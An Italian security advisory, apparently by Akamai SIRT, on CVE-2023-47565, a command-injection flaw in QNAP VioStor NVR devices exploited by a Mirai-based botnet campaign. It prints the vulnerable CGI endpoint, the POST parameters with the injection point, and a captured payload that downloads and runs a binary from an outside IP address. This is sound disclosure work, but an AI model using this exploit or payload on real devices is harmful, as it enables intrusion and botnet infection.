Vulnerabilità sfruttata attivamente nei dispositivi QNAP VioStor NVR: correzioni e patch disponibili
Analisi riassuntiva
Il team SIRT (Security Intelligence Response Team) di Akamai ha pubblicato un ulteriore aggiornamento al documento consultivo su InfectedSlurs ora che uno dei vendor coinvolti ha rilasciato istruzioni e informazioni al riguardo.
A questa vulnerabilità, identificata in rete e presente nei dispositivi QNAP, è stato assegnato l'ID CVE-2023-47565 con un punteggio CVSS v3 di 8,0.
I payload dannosi acquisiti in rete installano un malware basato su Mirai con l'intenzione di creare una botnet DDoS (Distributed Denial-of-Service) .
Nella ricerca originale, abbiamo incluso un elenco completo degli indicatori di compromissione (IOC) e delle regole Snort e YARA per aiutare a identificare questi tentativi di sfruttamento in rete e le possibili infezioni attive sulle reti dei sistemi di difesa.
Cosa dovete sapere
Nell'ambito della nostra ricerca su InfectedSlurs, il team SIRT ha scoperto una vulnerabilità nei dispositivi QNAP VioStor NVR (Network Video Recorder), che viene attivamente sfruttata in rete. Il dispositivo NVR è una soluzione di videosorveglianza di rete ad alte performance per il monitoraggio di telecamere IP, che offre funzioni di registrazione video, riproduzione e accesso remoto ai dati. Alla vulnerabilità è stato assegnato l'ID CVE-2023-47565 con un punteggio CVSS v3 di 8,0.
La vulnerabilità consente ad un criminale autenticato di sferrare un attacco di inserimento di comandi del sistema operativo (OS Command Injection) con un payload trasmesso tramite una richiesta POST all'interfaccia di gestione. Nella sua configurazione attuale, vengono utilizzate le credenziali predefinite del dispositivo nei payload acquisiti.
Sono interessate le seguenti versioni del firmware QNAP VioStor NVR:
VioStor NVR: versioni 5.0.0 e versioni precedenti (versione 5.0.0 rilasciata il 21 giugno 2014)
QNAP ha interrotto il supporto per questi dispositivi, tuttavia, il fornitore consiglia di aggiornare il firmware VioStor sui dispositivi esistenti all'ultima versione disponibile. Questo problema è stato corretto con una patch, che, tuttavia, non è stata mai pubblicamente segnalata/divulgata. Inoltre, si consiglia agli utenti di cambiare le password predefinite sui loro dispositivi.
Infine, US-CERT ha pubblicato un documento consultivo.
Rilevamento di uno sfruttamento
Inizialmente, analizzando i payload dell'exploit durante la campagna InfectedSlurs, avevamo segnalato solo due vulnerabilità zero-day poiché il team non era riuscito a collegare efficacemente l'exploit che avevamo osservato con uno specifico dispositivo o produttore. Questo problema aveva reso difficile stabilire la classificazione zero-day dell'exploit.
Dopo un esame più approfondito di vari aspetti dell'exploit e dei payload, il SIRT ha identificato l'obiettivo della campagna nei dispositivi QNAP VioStor NVR, che rientrano nel profilo dei sistemi presi di mira dalla campagna poiché sono stati forniti con credenziali predefinite deboli (come si legge nei relativi manuali e come abbiamo osservato nell'exploit). Poiché si trattava di questo caso con le due iniziali vulnerabilità zero-day, i dispositivi infettati potevano facilitare la presenza di vulnerabilità OS Command Injection nelle impostazioni NTP sui dispositivi IoT (Internet of Things) e NVR.
Il team US-CERT, dopo aver ricevuto le nostre teorie, si è coordinato con il SIRT di Akamai e con QNAP per rivedere le prove raccolte e aiutare a confermare le teorie del SIRT. Infine, QNAP ha confermato che i payload hanno preso di mira i suoi dispositivi VioStor, che sono stati ritirati e a cui non viene più fornito il supporto, ma solo le versioni meno recenti (fino alla versione 5.0.0) del firmware rilasciato in precedenza dall'azienda.
La vulnerabilità è stata sfruttata effettuando una richiesta POST al percorso /cgi-bin/server/server.cgi . L'esecuzione di codice remoto (RCE) si verifica quando viene specificato l'argomento per SPECIFIC_SERVER (Figura 1).
URL:
/cgi-bin/server/server.cgi?func=server02_main_submit&counter=8.540406879901406&APPLY=
PAYLOAD:
time_mode=2&time_YEAR=0&time_MONTH=0&time_DAY=0&time_HOUR=0&time_MINUTE=0&time_SECOND=0&enable_rtc=1&TIMEZONE=50&year=&month=&day=&CONFIGURE_NTP=on&SPECIFIC_SERVER=[RCE_PAYLOAD]
Figura 1. Tentativo di sfruttamento della vulnerabilità RCE tramite Command Injection
Un esempio del payload di infezione acquisito è illustrato nella Figura 2.
wget+http://94.156.68.148/zerx86;chmod+777+*;./zerx86+viox86
Figura 2. Payload RCE acquisito
Le procedure di sicurezza di base sono fondamentali
Le procedure di base sono fondamentali. Queste osservazioni ancora una volta evidenziano l'importanza di seguire procedure di sicurezza di base, come cambiare le password predefinite sui dispositivi durante la configurazione iniziale. come anche di implementare protocolli proattivi che garantiscono una sicurezza ancora maggiore nel lungo termine, come aggiornare costantemente i sistemi per proteggerli da potenziali attacchi e controllare occasionalmente i sistemi/dispositivi, specialmente se si notano comportamenti insoliti.
Conclusione
Ancora una volta, la nostra implementazione di rete honeypot personalizzata ha fornito preziose informazioni sugli attacchi informatici, rivelando vulnerabilità in precedenza sconosciute. La presenza di credenziali predefinite e di sistemi connessi in rete obsoleti e di cui non viene più fornito il supporto ha rappresentato il percorso seguito dalle infezioni della botnet. I sistemi tradizionali sono un terreno fertile per il rilevamento e lo sfruttamento di nuove vulnerabilità allo scopo di diffondere il malware.
Questo risultato enfatizza l'importanza cruciale di migliorare la consapevolezza e la formazione sulle best practice da adottare per i dispositivi IoT, evidenziando i rischi associati per il consumatore medio; la necessità di consapevolezza si estende oltre gli utenti e si applica anche ai produttori di questi dispositivi. Una protezione e una manutenzione prolungata del software al momento della configurazione, come forzare il cambio delle password, sono fondamentali per mantenere la sicurezza dei sistemi.
Tenetevi al passo
L'Akamai Security Intelligence Group continuerà a monitorare minacce come queste e fornirà i relativi rapporti per aumentare la consapevolezza nei nostri clienti e nella comunità della sicurezza in generale. Per ulteriori ricerche, seguiteci su X(in precedenza, noto come Twitter) per tenervi aggiornati su ciò che stiamo osservando.
Il team SIRT di Akamai desidera ringraziare tutti in CISA, US- CERT e QNAP per la loro assistenza nel nostro processo di comunicazione, coordinamento, identificazione, mitigazione e divulgazione.
